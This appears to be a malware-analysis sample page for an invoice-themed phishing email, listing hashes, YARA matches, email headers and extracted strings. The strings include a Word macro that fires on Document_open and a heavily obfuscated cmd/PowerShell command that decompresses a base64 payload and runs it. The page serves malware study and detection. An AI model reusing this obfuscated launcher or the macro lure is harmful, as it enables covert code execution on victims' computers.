Sample details: bdb84fe7250ff050fd1581d3457bbe00

Hashes
MD5: bdb84fe7250ff050fd1581d3457bbe00
SHA1: b441e1318fa5ecc1d4dbc3611cc8d369ea34edc0
SHA256: 0839956ca84d000f813ffe35407a97005a2aed9397b0a46a088cc4e9db5c6ae7
SSDEEP: 1536:NLWdWiuiLiocn1kp59gxBK85fBt+a9SP:NEu+41k/W48s
Details
File Type: Composite
Added: 2018-11-06 19:11:23
Yara Hits
YRP/without_images | YRP/with_urls | YRP/powershell | YRP/office_document_vba | YRP/Contains_VBA_macro_code | YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/maldoc_OLE_file_magic_number | YRP/Misc_Suspicious_Strings | YRP/Big_Numbers1 | FlorianRoth/PowerShell_Case_Anomaly
Strings
		rcpg125"2
t@794-24& 9"7
8  (fax)I
:m 1@Q
TTh!1n
@!pndb 
y b P!
 ,a-!q Padd
!Bunau-0
iz1#f 5
 >b/y6
`Pwful3
Received: from MBX16D-ORD1.mex06.mlsrvr.com (172.29.1.48) by
 MBX16A-IAD3.mex06.mlsrvr.com (172.29.33.47) with Microsoft SMTP Server
 (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256_P256) id
 15.1.1466.3 via Mailbox Transport; Tue, 6 Nov 2018 13:04:16 -0500
Received: from MBX14C-ORD1.mex06.mlsrvr.com (172.29.1.40) by
 MBX16D-ORD1.mex06.mlsrvr.com (172.29.1.48) with Microsoft SMTP Server
 (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256_P256) id
 15.1.1466.3; Tue, 6 Nov 2018 12:04:15 -0600
Received: from gate.forward.smtp.iad3a.emailsrvr.com (204.232.172.40) by
 MBX14C-ORD1.mex06.mlsrvr.com (172.29.1.40) with Microsoft SMTP Server (TLS)
 id 15.0.1367.3 via Frontend Transport; Tue, 6 Nov 2018 12:04:15 -0600
Received: from [216.104.162.134] ([216.104.162.134:44898] helo=smtp01-smtp-4.daemonmail.net)
	by smtp22.gate.iad3a.rsapps.net (envelope-from <jct@jctomco.com>)
	(ecelerity 4.2.38.62370 r(:)) with ESMTP
	id 0C/0C-23706-E97D1EB5; Tue, 06 Nov 2018 13:04:15 -0500
Received: from mxw-out01.daemonmail.net (mxw-out01.daemonmail.net [216.104.161.15])
	by smtp01-smtp-4.daemonmail.net (Postfix) with ESMTP id 9D00C45BFC
	for <andrew@championsretreat.net>; Tue,  6 Nov 2018 10:04:14 -0800 (PST)
Received: from localhost (localhost [127.0.0.1])
	by mxw-out01.daemonmail.net (Postfix) with ESMTP id 6C70A41C6F
	for <andrew@championsretreat.net>; Tue,  6 Nov 2018 10:04:14 -0800 (PST)
Received: from mxw-out01.daemonmail.net ([127.0.0.1])
	by localhost (mxw-out01.daemonmail.net [127.0.0.1]) (amavisd-new, port 10024)
	with ESMTP id hu-wSXwaCGU0 for <andrew@championsretreat.net>;
	Tue,  6 Nov 2018 10:04:12 -0800 (PST)
Received: from serv25.tierra.net (serv25.tierra.net [216.104.160.95])
	by mxw-out01.daemonmail.net (Postfix) with ESMTP id B456441C4E
	for <andrew@championsretreat.net>; Tue,  6 Nov 2018 10:04:12 -0800 (PST)
Received: from 10.14.60.23 (unknown [200.194.49.222])
	(Authenticated sender: jct@jctomco.com)
	by jctomco.com (Postfix) with ESMTPSA id 7A36C3EBEB
	for <andrew@championsretreat.net>; Tue,  6 Nov 2018 10:04:12 -0800 (PST)
From: "Mike Rymer mike@" <championsretreat.net jct@jctomco.com>
To: Andrew Press <andrew@championsretreat.net>
Subject: Outstanding invoices from Mike Rymer
Thread-Topic: Outstanding invoices from Mike Rymer
Thread-Index: AQHUdfshQ4/EJjy7t0GRqp+2G6ZMMg==
Date: Tue, 6 Nov 2018 18:05:03 +0000
Message-ID: <3974183605166217480.CC052E865C57ED3A@championsretreat.net>
Content-Language: en-US
X-MS-Exchange-Organization-AuthSource: MBX14C-ORD1.mex06.mlsrvr.com
X-MS-Has-Attach: yes
X-Auto-Response-Suppress: All
X-MS-TNEF-Correlator:
x-ms-exchange-organization-originalclientipaddress: 204.232.172.40
x-ms-exchange-organization-originalserveripaddress: 172.29.1.40
Content-Type: multipart/mixed;
	boundary="_002_3974183605166217480CC052E865C57ED3Achampionsretreatnet_"
MIME-Version: 1.0
--_002_3974183605166217480CC052E865C57ED3Achampionsretreatnet_
Content-Type: text/plain; charset="utf-8"
Content-ID: <F21A787B852E2F4983D60CBA6E3A7764@mex06.mlsrvr.com>
Content-Transfer-Encoding: base64
--_002_3974183605166217480CC052E865C57ED3Achampionsretreatnet_
Content-Type: application/msword; name="Untitled-KTY-C9485987.doc"
Content-Description: Untitled-KTY-C9485987.doc
Content-Disposition: attachment; filename="Untitled-KTY-C9485987.doc";
	size=74496; creation-date="Tue, 06 Nov 2018 18:04:16 GMT";
	modification-date="Tue, 06 Nov 2018 18:04:16 GMT"
Content-ID: <D77752A37DD3D244B3C386969BE095A6@mex06.mlsrvr.com>
Content-Transfer-Encoding: base64
--_002_3974183605166217480CC052E865C57ED3Achampionsretreatnet_--
/O=EXCHANGELABS/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=59AD09A89C2840378264FB47ED59B7F0-JCADORETTE
/O=EXCHANGELABS/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=59AD09A89C2840378264FB47ED59B7F0-JCADORETTE
SMTP:CHAMPIONSRETREAT.NET JCT@JCTOMCO.COM
SMTP:CHAMPIONSRETREAT.NET JCT@JCTOMCO.COM
CMD cMd.eXE/C  "SEt  cfS= (nEW-ObjeCt SYsTEM.iO.COmPRESSioN.DEfLATestREAm([IO.mEMorYstrEam] [SysTem.convErt]::FrOmBASe64sTRINg('NZBRa8IwFIX/Sh4CUZzpy0BmKFg23cpkPoiK4kua3s60aW5p03ZS/O+zhb6e8/Ed7qVf38630M4xSkE58gOOnyB6NxqsE1RvA5/dnCuWnifzItaV4wpzL1hfktWYmxh5Wpi86isuaw9O9+zYnNORUGgwj7SUvyUOjEJvfdnuiv1uMzJt2/JKVq6Odc94weE1Cccyl5GVVpdYD+v4yfi+MNpN2IpNBT2EmviELRZvTNBzcvQp2GbpIC9m7MpmfT9jHP6AiQRLkOo2oRgqoi3pL5x2rrx39PkJ/oGtNSjjjTYwMC+kF05FaBvMYB4+pUMioqcnEw8lnbp1j8c/') ,[SYSTem.iO.coMPREssioN.CompREsSioNmodE]::deCOmPResS )^| FOreAcH{ nEW-ObjeCt IO.STrEamReaDEr($_ , [TexT.ENCOdinG]::asCII )} ).ReADtOEND() ^| ^&( ([StrIng]$vErBOsePreFeReNCE)[1,3]+'x'-JoIn'')&&   pOWerSHELl   $2le87h  =[TYPe](\"{1}{3}{0}{2}\"-f'E','ENviR','NT','oNm'  )  ;  ${e`x`eCuTIoNC`ONtEXT}.\"in`VoKeC`O`MMAND\".(\"{0}{2}{3}{1}\" -f'i','Cript','nVo','kEs'  ).Invoke(  (   (  Get-VariaBLE (\"2L\"+  \"E87H\"  ) ).\"Va`lUe\"::(\"{2}{4}{0}{5}{3}{1}\"-f'ONMENT','ABLe','GeTEN','ArI','VIR','v').Invoke(  'cFS',(  \"{2}{1}{0}\" -f'sS','Oce','PR') )  )    )"
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
PKW}Rn
LzS.![
9.O@=s
\aQBQqo{4
9B7yhT
#+PzQE
{_69bw2
ZTjAN<
iVm:_1Vh
<7^+UPn
D`Ncl)=
u|\^,2
t]kZV`
D[f$[O
bO*p8<S
]u/h>&
us,z|~M
H!g>\.
Zg.Dj6
sA$nCCt
MFM]Y5
V_=v>`y
~enW.n
T'B5jA
 Xl@+,@
p0+Z<CJ
Z3I95g
;\m`=H<
RDl@*W
`XyL203
]b-NX%
P1eV_Q\
@&g$aB#
[{t_qn
\g+;kUB
_[_YEs
=79+G<
sY7m/u
?}ZWM%e
tW$x3+Q
[Content_Types].xml
_rels/.rels
theme/theme/themeManager.xml
theme/theme/theme1.xml
$4vq^W
MB[F7x"
>Yr]H+
a!e9#i
An7jah
theme/theme/_rels/themeManager.xml.rels
K(M&$R(.1
[Content_Types].xmlPK
_rels/.relsPK
theme/theme/themeManager.xmlPK
theme/theme/theme1.xmlPK
theme/theme/_rels/themeManager.xml.relsPK
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
[Content_Types].xml
dlyLho
_rels/.rels
drs/e2oDoc.xml
drs/downrev.xmlL
@/8lR#
[Content_Types].xmlPK
_rels/.relsPK
drs/e2oDoc.xmlPK
drs/downrev.xmlPK
Normal.dotm
Microsoft Office Word
Jordyn-PC
Attribut
e VB_Nam
e = "wRw
KSaUDD"
ormal.Th
isDocume
VGlobaBl
Cre atabl
Pr@edecla
plateDer
$Custo
  Sub 
n Error 
qDq + jr
S / DHAV
@aFTjrl
G0uOUr
wTonjX
knBOsi *
 hmtEBL
 aQJNN
W@Hqdstk
u cqzdB
+ WtRWtA
jICHBn
XKKj@ruSGAC@
83684964
ell@ Sha
pes(1).T
Pnov`oCb, 
,vntmzv
@,(FEhrD
@OiCwBbA
n Ohjzn
D@PRLHk)C]h
T(npaF
a fMLLqC
CWqj"G@
 OlDIs
jQzvd!B
SGRpEA
UNjUMw 
Win64x
Project1
stdole
Project-
ThisDocument<
_Evaluate
Normal
Office
Documentj
wRwKSaUDD
Document_open
PLjqDq
jrTuBN
EUzUmz
aFTjrlL
YGFph=;
hwNTrj%_
LLkIw 
wTonjXm
knBOsi\
hmtEBL
PUzSzE
oskSWS
Hqdstk
ucqzdB
NJFKXL
zpqFhL
jICHBn
XKKjruSGAC
ShellV
Shapes
TextFrame
TextRange
XDfaVsMj
jPnovoCbI
OPSiL>
vntmzve
FEhrD..
OiCwBb
nOhjzn
PRLHk1
hizzj0
JNmiFa.
bajZnq
fMLLq/p
CKdMSj
mKusi/
NjnTaL
Gwkckq
HKdnEV{?
jQzvdq
GShTKm
ffvimf=
SGRpEs
nZEvWr"G
YfRqkV@m
UNjUMw
Project
\G{00d
0046}#
2.0#0#C:
\Windows
\system3
e2.tlb
#OLE Aut
omation
ENormal
!Offic
!G{2DF
8D04C-5B
FA-101B-
m Files\@Common
icrosoft
 Shared\
OFFICE16
\MSO.DLL
M 16.0
9wRwKSaU DDG
*\CNormalrU
ThisDocument
Project
wRwKSaUDD
C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL
C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB
C:\Windows\system32\stdole2.tlb
stdole
C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL
Office
Document
Document_open
wRwKSaUDD
ID="{6B16B1AB-FF13-422F-8AAC-9DEC2FCDEE2C}"
Document=wRwKSaUDD/&H00000000
ExeName32="zrWOmHWwpu"
Name="Project"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="0B0944831B871B871B871B87"
DPB="E6E4A9E85F183B193B193B"
GC="C1C38E138F138FEC"
Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
[Workspace]
wRwKSaUDD=0, 0, 0, 0, C
Microsoft Word 97-2003 Document
MSWordDoc
Word.Document.8
Normal.dotm
Microsoft Office Word
Jordyn-PC
SMTP:ANDREW@CHAMPIONSRETREAT.NET